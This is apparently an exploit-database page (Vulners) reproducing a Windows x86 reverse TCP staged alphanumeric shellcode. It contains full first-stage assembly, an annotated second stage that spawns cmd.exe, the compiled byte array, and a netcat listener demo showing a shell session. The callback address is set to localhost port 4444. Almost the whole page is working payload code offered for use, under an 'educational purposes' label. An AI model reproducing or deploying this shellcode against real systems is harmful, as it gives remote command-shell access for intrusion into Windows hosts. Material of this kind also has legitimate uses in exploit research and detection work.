Vulners
Lucene search
Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)
########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
########### Author: Snir Levi, Applitects #############
## 332 Bytes ##
## For Educational Purposes Only ##
Date: 01.03.17
Author: Snir Levi
Email: [email protected]
https://github.com/snir-levi/
IP - 127.0.0.1
PORT - 4444
Tested on:
Windows 7
Windows 10
###Usage###
Victim Executes the first stage shellcode, and opens tcp connection
After Connection is established, send the Alphanumeric stage to the connection
nc -lvp 4444
connect to [127.0.0.1] from localhost [127.0.0.1] (port)
RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
PhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
TXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
RRRBRJRRQRAAAAAAANNNNS
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\>
###########
##Shellcode##
#### Second Stage Alphanumeric shellcode: #####
RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
PhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
TXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
RRRBRJRRQRAAAAAAANNNNS
R push edx
P push eax
hoces push 0x7365636f //oces
htePr push 0x72506574 //tePr
hCrea push 0x61657243 //Crea
T push esp
Q push ecx
PX will be replaced with call [esi] (0x16ff)
L*8 dec esp // offset esp to kernel32.dll Address
Y pop ecx // ecx = kernel32
F*4 inc esi -> offset [esi+4]
PX will be replaced with mov [esi],eax (0x0689)
N*4 dec esi -> offset [esi]
j0 push 0x30
X pop eax
H*48 dec eax // zeroing eax
P push eax
hessA push 0x41737365 //essA (will be null terminated)
hProc push 0x636f7250 //Proc
hExit push 0x74697845 //Exit
T push esp
Q push ecx
PX will be replaced with call [esi] (0x16ff)
F*8 inc esi -> offset [esi+8]
PX will be replaced with mov [esi],eax (0x0689)
Z*10 offset stack to &processinfo
j0 push 0x30
Y pop ecx
I*48 dec ecx // zeroing ecx
T push esp
X pop eax //eax = &PROCESS_INFORMATION
Q*4 push ecx //sub esp,16
W push edi
W push edi
W push edi
Q push ecx
Q push ecx
B inc edx
R push edx
Q*10 push ecx
jD push 0x44
T push esp
Z pop edx //edx = &STARTUPINFOA
hexeC push 0x65
hcmd. push 0x78652e64
T push esp // &'cmd.exe'
Y pop ecx
P push eax // &PROCESS_INFORMATION
R push edx // &STARTUPINFOA
j0 push 0x30
Z pop edx
J*48 dec edx // zeroing edx
R*3 push edx
B inc edx
R push edx
J dec edx
R*2 push edx
Q push ecx ; &'cmd.exe'
R push edx
A*7 inc ecx //offset ecx to [C]exeh -> will be null terminated
N*4 dec esi //offset [esi+4] to CreateProccesA
S push ebx ; return address
## First Stage Shellcode ##
global _start
section .text
_start:
xor eax,eax
push eax ; null terminator for createProcA
mov eax,[fs:eax+0x30] ; Proccess Enviroment Block
mov eax,[eax+0xc]
mov esi,[eax+0x14]
lodsd
xchg esi,eax
lodsd
mov ebx,[eax+0x10] ; kernel32
mov ecx,[ebx+0x3c] ; DOS->elf_anew
add ecx, ebx; Skip to PE start
mov ecx, [ecx+0x78] ; offset to export table
add ecx,ebx ; kernel32 image_export_dir
mov esi,[ecx+0x20] ; Name Table
add esi,ebx
xor edx,edx
getProcAddress:
inc edx
lodsd
add eax,ebx
cmp dword [eax],'GetP'
jne getProcAddress
cmp dword [eax+4],'rocA'
jne getProcAddress
;---Function Adresses Chain----
;[esi] GetProcAddress
;[esi+12] WSAstartup
;[esi+16] WSASocketA
;[esi+20] connect
;[esi+24] recv
;[esi+28] kernel32
;Alphanumeric stage store:
;[esi+4] CreateProcessA
;[esi+8] ExitProccess
mov esi,[ecx+0x1c] ; Functions Addresses Chain
add esi,ebx
mov edx,[esi+edx*4]
add edx,ebx ; GetProcAddress
sub esp, 32 ; Buffer for the function addresses chain
push esp
pop esi
mov [esp],edx ; esi offset 0 -> GetProcAddress
mov [esi+28],ebx ;esi offset 28 -> kernel32
;--------winsock2.dll Address--------------
xor edi,edi
push edi
push 0x41797261 ; Ayra
push 0x7262694c ; rbiL
push 0x64616f4c ; daoL
push esp
push ebx
call [esi]
;-----ws2_32.dll Address-------
xor ecx,ecx
push ecx
mov cx, 0x3233 ; 0023
push ecx
push 0x5f327377 ; _2sw
push esp
call eax
mov ebp,eax ;ebp = ws2_32.dll
;-------WSAstartup Address-------------
xor ecx,ecx
push ecx
mov cx, 0x7075 ; 00up
push ecx
push 0x74726174 ; trat
push 0x53415357 ; SASW
push esp
push ebp
call [esi]
mov [esi+12],eax ;esi offset 12 -> WSAstartup
;-------WSASocketA Address-------------
xor ecx,ecx
push ecx
mov cx, 0x4174 ; 00At
push ecx
push 0x656b636f ; ekco
push 0x53415357 ; SASW
push esp
push ebp
call [esi]
mov [esi+16],eax;esi offset 16 -> WSASocketA
;------connect Address-----------
push edi
mov ecx, 0x74636565 ; '\0tce'
shr ecx, 8
push ecx
push 0x6e6e6f63 ; 'nnoc'
push esp
push ebp
call [esi]
mov [esi+20],eax;esi offset 20 -> connect
;------recv Address-------------
push edi
push 0x76636572 ;vcer
push esp
push ebp
call [esi]
mov [esi+24],eax;esi offset 24 -> recv
;------call WSAstartup()----------
xor ecx,ecx
sub sp,700
push esp
mov cx,514
push ecx
call [esi+12]
;--------call WSASocket()-----------
; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
; IPPROTO_TCP = 6, NULL,
;(unsigned int)NULL, (unsigned int)NULL);
push eax ; if successful, eax = 0
push eax
push eax
mov al,6
push eax
mov al,1
push eax
inc eax
push eax
call [esi+16]
xchg eax, edi ; edi = SocketRefernce
;--------call connect----------
;struct sockaddr_in {
; short sin_family;
; u_short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
;};
push byte 0x1
pop edx
shl edx, 24
mov dl, 0x7f ;edx = 127.0.0.1 (hex)
push edx
push word 0x5c11; port 4444
push word 0x2
;int connect(
;_In_ SOCKET s,
;_In_ const struct sockaddr *name,
;_In_ int namelen
;);
mov edx,esp
push byte 16 ; sizeof(sockaddr)
push edx ; (sockaddr*)
push edi ; socketReference
call [esi+20]
;--------call recv()----------
;int recv(
;_In_ SOCKET s,
;_Out_ char *buf,
;_In_ int len,
;_In_ int flags
;);
stage:
push eax
mov ax,950
push eax ;buffer length
push esp
pop ebp
sub ebp,eax ; set buffer to [esp-950]
push ebp ;&buf
push edi ;socketReference
call [esi+24]
executeStage:
xor edx,edx
mov byte [ebp+eax-1],0xc3 ; end of the Alphanumeric buffer -> ret
mov byte [ebp+96],dl ; null terminator to ExitProcess
mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address
dec ebp
mov word [ebp+20],0x16ff ; call DWORD [esi]
mov word [ebp+35],0x0689 ; mov [esi],eax
mov word [ebp+110],0x16ff; call DWORD [esi]
mov word [ebp+120],0x0689; mov [esi],eax
mov ax,0x4173 ; As (CreateProcessA)
mov ecx,[esi+28] ; ecx = kernel32
dec dl ;edx = 0x000000ff
call ebp ; Execute Alphanumeric stage
executeShell:
mov [ecx],dl ;null terminator to 'cmd.exe'
call dword [esi] ;createProcA
push eax
call dword [esi+4] ; ExitProccess
-----------------------
unsigned char shellcode[]=
"\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20
\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14
\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64
\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74
\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41
\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68
\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06
\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57
\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b
\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c
\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04";
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Mar 2017 00:00Current
7.4High risk
Vulners AI Score7.4